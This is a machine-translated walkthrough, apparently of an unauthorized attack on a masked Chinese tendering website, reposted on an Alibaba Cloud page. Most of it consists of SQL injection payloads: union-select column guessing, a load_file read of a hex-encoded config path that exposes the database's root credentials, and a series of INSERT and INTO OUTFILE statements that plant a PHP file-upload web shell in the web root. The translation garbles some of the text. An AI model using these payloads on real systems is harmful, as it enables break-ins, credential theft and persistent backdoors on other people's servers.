Record the entire process of a security check

Source: Internet
Author: User

 
The test site is as follows:

Http: // www. ******. com

Find a step

Http: // www. ******. com/zhaobiao/zhaobiao_hy_show.php? Id = 149830

Submit one

Returned results

Warning: mysql_result (): supplied argument is not a valid MySQL result resource in

/Var/www/html/zhaobiao/zhaobiao_hy_show.php on line 135

Warning: mysql_result (): supplied argument is not a valid MySQL result resource in

/Var/www/html/zhaobiao/zhaobiao_hy_show.php on line 140

Warning: mysql_result (): supplied argument is not a valid MySQL result resource in

/Var/www/html/zhaobiao/zhaobiao_hy_show.php on line 154

The path is out and security check continues.

Http: // www. ******. com/zhaobiao/zhaobiao_hy_show.php? Id = 149830 & #39; and 1 = 1 #

An error is returned, not a struct type.

Note: % 23 is #

Submit and 1 = 1 and return normal

Submission and 1 = 2 returns abnormal

The following is the union statement.

And 1 = 1 union select 1 returns abnormal

And 1 = 1 union select 1, 2 returns abnormal

And 1 = 1 union select 1, 2, 3 returns abnormal

And 1 = 1 union select 1, 2, 3, 4 returns abnormal

And 1 = 1 union select 1, 2, 3, 4, 5 return abnormal

And 1 = 1 union select 1, 2, 3, 4, 5, 6 Returns abnormal

And 1 = 1 union select 1, 2, 4, 5, 6, 7 returns abnormal

And 1 = 1 union select 1, 2, 3, 4, 5, 6, 7, 8 returns abnormal

And 1 = 1 union select 1, 2, 3, 4, 5, 6, 7, 8, 9 return abnormal

And 1 = 1 union select 1, 2, 3, 4, 5, 6, 7, 8, 9, 10 returns abnormal

And 1 = 1 union select 1, 2, 4, 5, 6, 7, 8, 9, 10, 11 returns abnormal

And 1 = 1 union select 1, 2, 4, 5, 6, 7, 8, 9, 10, 11, 12 returns abnormal

And 1 = 1 union select 1, 2, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13 returns abnormal

And 1 = 1 union select 1, 2, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14 return normal

It will be normal to guess 14 and continue the next step.

Generally, it is impossible for us to find such a site in the background ..

Let's see if there is any more ..

Guess common paths.

Login. php
Admin. php
Admin_login.php
Admin_index.php
Admin/login. php
Admin/admin. php
Admin/admin_login.php
Admin/admin_index.php
Manage/index. php
Manage/login. php
Manage/admin_login.php
Manage/admin_index.php

Wait. If you have the patience, you can guess it slowly. Even if you have guessed it, it will be useless.

Let's use a direct method. Use load_file to read the file content directly.

Http: // www. ******. com/zhaobiao/zhaobiao_hy_show.php? Id = 149830 and 1 = 1 union select 1, 2, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14

Http: // www. ******. com/zhaobiao/zhaobiao_hy_show.php? Id = 149830 and 1 = 2 union select 1, 2, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14
And 1 = 1 to and 1 = 2

The returned results are as follows:

2

The file content we need is cracked at location 2.

From/var/www/html/zhaobiao/zhaobiao_hy_show.php

Directly use load_file (/var/www/html/zhaobiao/zhaobiao_hy_show.php)

The premise is to convert/var/www/html/zhaobiao/zhaobiao_hy_show.php to hexadecimal

Http: // www. ******. com/zhaobiao/zhaobiao_hy_show.php? Id = 149830 and 1 = 2 union select 1, load_file

(Random), 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14

Returned results

0 or $ regdate> mysql_result ($ query, 0, yxdate) {?>

", Mysql_result ($ query, 0, sm);?>

Do not worry about this. Check that the source file finds an inc. php file and works with the preceding path.

/Var/www/html/inc. php

Http: // www. ******. com/zhaobiao/zhaobiao_hy_show.php? Id = 149830 and 1 = 2 union select 1, load_file

(0x2f7661722f77772f68746d6c2f696e632e706870), 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14

When a brute-force attack returns, you cannot see the content and directly view the source file.

<?
$ Myconn = mysql_connect (localhost, root, www. ******. comy0p5h1i0 );
Mysql_select_db (mlk );
?>

Mysql is exposed ..

The next step is to log on to Mysql and insert the prepared pony ..

Use mlk;
Create table mmxy (cmd TEXT );
Insert into mmxy values (<? Php );
Insert into mmxy values ($ msg = copy ($ _ FILES [MyFile] [tmp_name], $ _ FILES [MyFile] [name])? "Successful": "failure ";);
Insert into mmxy values (echo $ msg ;);
Insert into mmxy values (?> );
Insert into mmxy values (<form ENCTYPE = "multipart/form-data" ACTION = "" METHOD = "POST"> );
Insert into mmxy values (<input NAME = "MyFile" TYPE = "file"> );
Insert into mmxy values (<input VALUE = "Up" TYPE = "submit"> </form> );
Select * from mmxy into outfile/var/www/html/zhaobiao/mmxy. php;

Related Article

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.